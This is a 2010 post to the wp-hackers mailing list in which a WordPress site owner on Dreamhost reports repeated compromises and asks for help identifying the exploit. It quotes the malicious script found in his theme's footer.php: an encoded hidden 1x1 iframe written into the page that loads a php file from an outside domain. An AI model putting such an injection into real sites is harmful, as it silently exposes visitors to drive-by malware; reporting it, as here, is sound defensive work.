[wp-hackers] wordpress theme script injection (hosted on dreamhost)
Mladen Adamovic
mladen.adamovic at gmail.com
Sun Oct 31 15:07:57 UTC 2010
Hi guys,
My wordpress software instance was repeatedly hacked ... running latest
Wordpress source code and being hosted on Dreamhost.
I don't know which exploit it did use and couldn't identify it, but it was
adding the following code to my default theme footer.php:
<script>
enc =
"%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
I think I'll have to migrate to Blogger, since I couldn't identify exploit
it did use.
I wanted to drop you an email anyhow since identifying exploits is
important!
More information about the wp-hackers
mailing list